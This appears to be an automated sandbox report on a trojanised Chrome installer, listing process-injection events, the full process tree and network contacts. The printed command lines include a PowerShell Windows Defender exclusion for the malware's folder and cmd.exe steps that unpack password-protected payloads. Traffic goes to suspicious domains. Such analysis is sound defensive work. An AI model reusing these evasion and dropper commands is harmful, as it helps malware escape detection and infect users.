N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3436 wrote to memory of 756 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 3436 wrote to memory of 756 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 3436 wrote to memory of 4524 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 3436 wrote to memory of 4524 N/A C:\Windows\system32\msiexec.exe C:\Windows\System32\MsiExec.exe
PID 4524 wrote to memory of 3560 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4524 wrote to memory of 3560 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4524 wrote to memory of 2428 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 4524 wrote to memory of 2428 N/A C:\Windows\System32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 2428 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 2428 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 2428 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 2428 wrote to memory of 1320 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2428 wrote to memory of 1320 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2428 wrote to memory of 4012 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 2428 wrote to memory of 4012 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 2428 wrote to memory of 4012 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 4524 wrote to memory of 1904 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 4524 wrote to memory of 1904 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 4524 wrote to memory of 1904 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 4524 wrote to memory of 1312 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe
PID 4524 wrote to memory of 1312 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe
PID 4524 wrote to memory of 1312 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe
PID 1312 wrote to memory of 2208 N/A C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe
PID 1312 wrote to memory of 2208 N/A C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe
PID 1312 wrote to memory of 2208 N/A C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe
PID 2208 wrote to memory of 3176 N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe
PID 2208 wrote to memory of 3176 N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe
PID 2208 wrote to memory of 3176 N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe
PID 3840 wrote to memory of 1964 N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
PID 3840 wrote to memory of 1964 N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
PID 3840 wrote to memory of 1964 N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
PID 3480 wrote to memory of 1628 N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
PID 3480 wrote to memory of 1628 N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
PID 3480 wrote to memory of 1628 N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
PID 3172 wrote to memory of 608 N/A C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 3172 wrote to memory of 608 N/A C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 3172 wrote to memory of 608 N/A C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 608 wrote to memory of 1700 N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 608 wrote to memory of 1700 N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 608 wrote to memory of 1700 N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 3480 wrote to memory of 3952 N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe
PID 3480 wrote to memory of 3952 N/A C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe
PID 3952 wrote to memory of 4168 N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 3952 wrote to memory of 4168 N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 4168 wrote to memory of 1972 N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 4168 wrote to memory of 1972 N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 4168 wrote to memory of 2368 N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 4168 wrote to memory of 2368 N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 2368 wrote to memory of 3336 N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 2368 wrote to memory of 3336 N/A C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 2208 wrote to memory of 1544 N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2208 wrote to memory of 1544 N/A C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 4460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ChromeSetupz.5516.25.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 66E8F5AE06D39077EDE38968856D3E64 E Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\DriveHumbleTechnician'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr" -o"C:\Program Files\DriveHumbleTechnician\" -p"373357|xZmCie].{GTlD" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir" -x!1_yrjwPObnoqyg.exe -o"C:\Program Files\DriveHumbleTechnician\" -p"91844v.Gsd9S^{PzzOfj" -y

C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe

"C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr" -o"C:\Program Files\DriveHumbleTechnician\" -p"373357|xZmCie].{GTlD" -y

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe

"C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir" -x!1_yrjwPObnoqyg.exe -o"C:\Program Files\DriveHumbleTechnician\" -p"91844v.Gsd9S^{PzzOfj" -y

C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe

"C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe" -number 121 -file file3 -mode mode3

C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe

"C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe"

C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe

"C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe" --install=appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={FD39FE3E-F972-AC55-37EA-CE3FED473068}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-statsdef_1&installdataindex=empty --enable-logging --vmodule=*/components/winhttp/*=1,*/components/update_client/*=2,*/chrome/updater/*=2

C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe

"C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x52c694,0x52c6a0,0x52c6ac

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe

"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update-internal

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe

"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x81c694,0x81c6a0,0x81c6ac

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.vbs"

C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe

"C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe" install

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe

"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe

"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x81c694,0x81c6a0,0x81c6ac

C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe

"C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe" start

C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe

"C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe"

C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe

"C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe" -number 166 -file file3 -mode mode3

C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe

"C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe" -number 62 -file file3 -mode mode3

C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe

"C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --installerdata="C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\27c53165-5483-48e1-8169-09d4bb877bd0.tmp"

C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe

"C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe" --install-archive="C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --installerdata="C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\27c53165-5483-48e1-8169-09d4bb877bd0.tmp"

C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe

"C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=130.0.6723.117 --initial-client-data=0x270,0x274,0x278,0x24c,0x27c,0x7ff60a6fec28,0x7ff60a6fec34,0x7ff60a6fec40

C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe

"C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe

"C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=130.0.6723.117 --initial-client-data=0x270,0x274,0x278,0x24c,0x27c,0x7ff60a6fec28,0x7ff60a6fec34,0x7ff60a6fec40

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=130.0.6723.117 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffc1db7c38,0x7fffc1db7c44,0x7fffc1db7c50

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=1960 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2092,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=2352,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2920,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=3080 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2932,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\130.0.6723.117\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\130.0.6723.117\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3860,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4612,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=4624 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4700,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5416,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5432,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations=is-enterprise-managed=no --field-trial-handle=5600,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=5768 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5696,i,7102083657735907835,9023696900099390168,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:2

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe

"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe

"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x81c694,0x81c6a0,0x81c6ac

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 im.qq.com udp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.212.227:443 update.googleapis.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
US 8.8.8.8:53 227.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 123.35.104.34.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
GB 216.58.201.99:80 o.pki.goog tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 fgfdg5631gfd.icu udp
HK 38.47.221.103:80 fgfdg5631gfd.icu tcp
US 8.8.8.8:53 103.221.47.38.in-addr.arpa udp
US 8.8.8.8:53 ryouok1688.cc udp
HK 154.23.180.81:10200 ryouok1688.cc tcp
US 8.8.8.8:53 81.180.23.154.in-addr.arpa udp
US 8.8.8.8:53 qweao.cyou udp
US 8.8.8.8:53 qweaq.shop udp
US 148.178.21.107:29550 qweaq.shop tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 qweao.cyou udp
US 148.178.21.107:29550 qweaq.shop tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
